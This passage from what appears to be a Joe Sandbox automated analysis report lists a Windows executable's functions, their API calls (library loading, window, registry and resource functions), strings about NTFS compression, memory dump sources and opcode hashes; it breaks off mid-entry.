                                                                                      • Opcode ID: 45ddc528c20c35e0718a7e9c00f94a1c84d7b78ddc924b0a461653c56359e4f8
                                                                                      • Instruction ID: 93babc8de609d28a759936f35cc35ab5444e0eee9e0897fa3c7a0f5d424eaefa
                                                                                      • Opcode Fuzzy Hash: 45ddc528c20c35e0718a7e9c00f94a1c84d7b78ddc924b0a461653c56359e4f8
                                                                                      • Instruction Fuzzy Hash: 5FD0C992352B726A6A1075FB3CD19EB02CCCE517B53A40077F684E7342EAADCC0535AD
                                                                                      Function 0044F178 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00493215), ref: 0044F1B3
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F1B9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: NotifyWinEvent$user32.dll
                                                                                      • API String ID: 1646373207-597752486
                                                                                      • Opcode ID: 1b77f3625f350db58ab3348097a305bf1d639b9e1269e079a5da3a737ffde695
                                                                                      • Instruction ID: 84f0676aae26238d79669219dc5dd421ce8b9c86ef8cbad31698c6a02a110ee9
                                                                                      • Opcode Fuzzy Hash: 1b77f3625f350db58ab3348097a305bf1d639b9e1269e079a5da3a737ffde695
                                                                                      • Instruction Fuzzy Hash: 25E012E0A01740DDEB10FBB5D942B0B3EA0EB5475DB01017BB4006619AC77C4C088B1D
                                                                                      Function 00492FE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00493266,00000001,00000000,0049328A), ref: 00492FEA
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00492FF0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                      • API String ID: 1646373207-834958232
                                                                                      • Opcode ID: 7dd0ed140dce1b1c3cfbac4273f952859e09270a56939a23c95a62daeb5fa57b
                                                                                      • Instruction ID: 931628e3c560cbc195009d45a592bfebd759f3ec05311ed7f501d7576358ba43
                                                                                      • Opcode Fuzzy Hash: 7dd0ed140dce1b1c3cfbac4273f952859e09270a56939a23c95a62daeb5fa57b
                                                                                      • Instruction Fuzzy Hash: A1B09281281701A08C1076F20E42E5B0C18584072571400373400B10CBCEACCA00382D
                                                                                      Function 00460EAC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0044B08C: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F1A9,00493215), ref: 0044B0B3
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B0CB
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B0DD
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B0EF
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B101
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B113
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B125
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B137
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B149
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B15B
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B16D
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B17F
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B191
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B1A3
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B1B5
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B1C7
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B1D9
                                                                                        • Part of subcall function 0044B08C: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B1EB
                                                                                      • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00493238), ref: 00460EBB
                                                                                      • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460EC1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                      • API String ID: 2238633743-2683653824
                                                                                      • Opcode ID: 93fe2c06cf711e01664fd138f27f9ab14834f9042b92f4705049898ce8c901dd
                                                                                      • Instruction ID: c6d074b57e85807914eec84ee8616fe1a8135e5451870e443c9658575dc96a53
                                                                                      • Opcode Fuzzy Hash: 93fe2c06cf711e01664fd138f27f9ab14834f9042b92f4705049898ce8c901dd
                                                                                      • Instruction Fuzzy Hash: 4EB092D0A51B11E48E10B7B39C4390B1814C544B0E710493BB0607A083EB7E40044E6E
                                                                                      Function 00413C68 Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDesktopWindow.USER32 ref: 00413CB6
                                                                                      • GetDesktopWindow.USER32 ref: 00413D6E
                                                                                        • Part of subcall function 00418E30: 6F5BC6F0.COMCTL32(?,00000000,00413F33,00000000,00414043,?,?,00496628), ref: 00418E4C
                                                                                        • Part of subcall function 00418E30: ShowCursor.USER32(00000001,?,00000000,00413F33,00000000,00414043,?,?,00496628), ref: 00418E69
                                                                                      • SetCursor.USER32(00000000,?,?,?,?,00413A63,00000000,00413A76), ref: 00413DAC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CursorDesktopWindow$Show
                                                                                      • String ID:
                                                                                      • API String ID: 2074268717-0
                                                                                      • Opcode ID: 86f28fd5b8e67e4ed68fb8d3243ff4e40f6b005c19925ef4854e6769390e0e23
                                                                                      • Instruction ID: 370eb430aafb64f03e0c00a45e78fc31171da0b863367db60babd08861f95fe9
                                                                                      • Opcode Fuzzy Hash: 86f28fd5b8e67e4ed68fb8d3243ff4e40f6b005c19925ef4854e6769390e0e23
                                                                                      • Instruction Fuzzy Hash: 5C412A75600150AFCB10EF29F988B9677E1AB65325B17847FE404DB369DA38EC81CF58
                                                                                      Function 004089BC Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 004089DD
                                                                                      • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408A4C
                                                                                      • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408AE7
                                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408B26
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString$FileMessageModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 704749118-0
                                                                                      • Opcode ID: 3ad30de8adde06992adcb1243033629fda3c93d42ee346dc6366a67b7f75c718
                                                                                      • Instruction ID: d4d784650a0269eb12294142f4e6c1e51b8c8d651a7e98bb559ca79e8df8d1d5
                                                                                      • Opcode Fuzzy Hash: 3ad30de8adde06992adcb1243033629fda3c93d42ee346dc6366a67b7f75c718
                                                                                      • Instruction Fuzzy Hash: 8F3141706083809FD730EB65C945B9B77E89B86304F40483FB6C8EB2D1DB7999098B67
                                                                                      Function 0044E2F8 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E341
                                                                                        • Part of subcall function 0044C984: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C9B6
                                                                                      • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E3C5
                                                                                        • Part of subcall function 0042BB24: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BB38
                                                                                      • IsRectEmpty.USER32(?), ref: 0044E387
                                                                                      • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E3AA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                      • String ID:
                                                                                      • API String ID: 855768636-0
                                                                                      • Opcode ID: 3f1c9d4db00e826481b178ab64ea00970205f687122e4d4c1c485c0144d2d05a
                                                                                      • Instruction ID: f1327bf96be57b41a4daac13efecf4e5f8c8315b345326dd3a19bc45d13401f9
                                                                                      • Opcode Fuzzy Hash: 3f1c9d4db00e826481b178ab64ea00970205f687122e4d4c1c485c0144d2d05a
                                                                                      • Instruction Fuzzy Hash: 55115E72B0030027E210BA7E8C86B6B76C99B89748F04083FB646EB383DE7DDC054399
                                                                                      Function 004900D0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 00490134
                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 0049014F
                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 00490169
                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 00490184
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: OffsetRect
                                                                                      • String ID:
                                                                                      • API String ID: 177026234-0
                                                                                      • Opcode ID: d3f66989ff800960b4c0a82a6ffd76303d58a919d7c08028faeb7088e89b5ea7
                                                                                      • Instruction ID: 0e3da5e30cc057e3d74a4c16cf1607cb24db427b0c3e95cd5a18fc3dad4c20bc
                                                                                      • Opcode Fuzzy Hash: d3f66989ff800960b4c0a82a6ffd76303d58a919d7c08028faeb7088e89b5ea7
                                                                                      • Instruction Fuzzy Hash: 52217CB6700201AFD700DE69CC85E6BB7EEEBC4300F14CA2AF694C7249D635ED448796
                                                                                      Function 00417188 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCursorPos.USER32 ref: 004171D0
                                                                                      • SetCursor.USER32(00000000), ref: 00417213
                                                                                      • GetLastActivePopup.USER32(?), ref: 0041723D
                                                                                      • GetForegroundWindow.USER32(?), ref: 00417244
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1959210111-0
                                                                                      • Opcode ID: 5c878ef1f1aeb2db91bf3432714928a7f2f2769f3bd036598b9914e69cbbf5aa
                                                                                      • Instruction ID: 86e626badbabc243afb65fecb2564bdd41232683b3d9035b7095670fd5686afe
                                                                                      • Opcode Fuzzy Hash: 5c878ef1f1aeb2db91bf3432714928a7f2f2769f3bd036598b9914e69cbbf5aa
                                                                                      • Instruction Fuzzy Hash: BA2183313086018ACB20AB69D889AD737F1AF45714F0645ABF8589B392D73DDC86CB59
                                                                                      Function 0048FD88 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(8B500000,00000008,?), ref: 0048FD9D
                                                                                      • MulDiv.KERNEL32(50142444,00000008,?), ref: 0048FDB1
                                                                                      • MulDiv.KERNEL32(F757C3E8,00000008,?), ref: 0048FDC5
                                                                                      • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 0048FDE3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                                      • Instruction ID: 0205f8053e5b888f5c8b1498a92a9aed559835e4432beced00229de2e9d93edf
                                                                                      • Opcode Fuzzy Hash: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                                      • Instruction Fuzzy Hash: 49112172604204ABCB40EEA9C8C4D9B77ECEF4D320B14416AF918DB246D634ED40CBA4
                                                                                      Function 0041F3F0 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClassInfoA.USER32(00400000,0041F3E0,?), ref: 0041F411
                                                                                      • UnregisterClassA.USER32(0041F3E0,00400000), ref: 0041F43A
                                                                                      • RegisterClassA.USER32(00494598), ref: 0041F444
                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F47F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                      • String ID:
                                                                                      • API String ID: 4025006896-0
                                                                                      • Opcode ID: d848210eac8fa203de2a57be4a09b5e70b2efef1fc89853c1c9f6bba622f69a5
                                                                                      • Instruction ID: 124ae18f6ccee6cd3f50944003dafe19b4a4e3b77e192b7b2acb4d1f887b2837
                                                                                      • Opcode Fuzzy Hash: d848210eac8fa203de2a57be4a09b5e70b2efef1fc89853c1c9f6bba622f69a5
                                                                                      • Instruction Fuzzy Hash: 390152712401047BCB10EBE8ED81E9B379CA769314B12413BBA05E72E1D6359C164BAD
                                                                                      Function 0040D170 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D187
                                                                                      • LoadResource.KERNEL32(00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,00477B64,0000000A,REGDLL_EXE), ref: 0040D1A1
                                                                                      • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,00477B64), ref: 0040D1BB
                                                                                      • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?), ref: 0040D1C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 3473537107-0
                                                                                      • Opcode ID: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                                      • Instruction ID: a2e4909c1946fcd89949086e6ecb513f2c22862e5b7fa6f76d970aa484769738
                                                                                      • Opcode Fuzzy Hash: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                                      • Instruction Fuzzy Hash: BEF0FF726056046F9754EE9DA881D5B76ECDE48264320416AF908EB246DE38DD118B78
                                                                                      Function 0046C4BC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0046C50D
                                                                                      Strings
                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 0046C51E
                                                                                      • Unsetting NTFS compression on file: %s, xrefs: 0046C4F3
                                                                                      • Setting NTFS compression on file: %s, xrefs: 0046C4DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                      • API String ID: 1452528299-3038984924
                                                                                      • Opcode ID: 86807cbfd2226bd454e4e46b74c8b92495b6acb580f029ac175535f9750d921d
                                                                                      • Instruction ID: 8a11723362a507f0333bc9965096a3e3adfce4be1f63418e8be67e25eb968b75
                                                                                      • Opcode Fuzzy Hash: 86807cbfd2226bd454e4e46b74c8b92495b6acb580f029ac175535f9750d921d
                                                                                      • Instruction Fuzzy Hash: E1016770E0825866CB04D7ED54812FDBBE49F4D314F84C1EFA499E7243EB791508879B
                                                                                      Function 00454788 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,00459E8A,?,?,?,?,?,00000000,00459EB1), ref: 004547C4
                                                                                      • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,00459E8A,?,?,?,?,?,00000000), ref: 004547CD
                                                                                      • RemoveFontResourceA.GDI32(00000000), ref: 004547DA
                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004547EE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                      • String ID:
                                                                                      • API String ID: 4283692357-0
                                                                                      • Opcode ID: 46c8cad0b261e60d48b1d3e67bfe7d27a1d7efb6af96d1f02519370c88f59435
                                                                                      • Instruction ID: 4674671b110c5257b68e85d971ffdb8cda5f86f627ed5b1345ff1e290f3286d1
                                                                                      • Opcode Fuzzy Hash: 46c8cad0b261e60d48b1d3e67bfe7d27a1d7efb6af96d1f02519370c88f59435
                                                                                      • Instruction Fuzzy Hash: A8F05EB575430136EA10B6B69C87F1B228C9F98749F10483BBA00EF2C3DA7CD805962D
                                                                                      Function 0046BBCC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,00000000), ref: 0046BC1D
                                                                                      Strings
                                                                                      • Failed to set NTFS compression state (%d)., xrefs: 0046BC2E
                                                                                      • Setting NTFS compression on directory: %s, xrefs: 0046BBEB
                                                                                      • Unsetting NTFS compression on directory: %s, xrefs: 0046BC03
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                      • API String ID: 1452528299-1392080489
                                                                                      • Opcode ID: 9042e0bba0a45541bb3a6888451997e20af0478713a1f8326d793a8a88ac9600
                                                                                      • Instruction ID: 69529bc4e5d6d07a91d00c664886aea47b6ace433f8fc03d3f3948ef3290ac7a
                                                                                      • Opcode Fuzzy Hash: 9042e0bba0a45541bb3a6888451997e20af0478713a1f8326d793a8a88ac9600
                                                                                      • Instruction Fuzzy Hash: 7B016730D0424866CB04D7AD54416DDBBE4DF4D304F44C1EFA858E7247EB79064887DB
                                                                                      Function 00477DA0 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
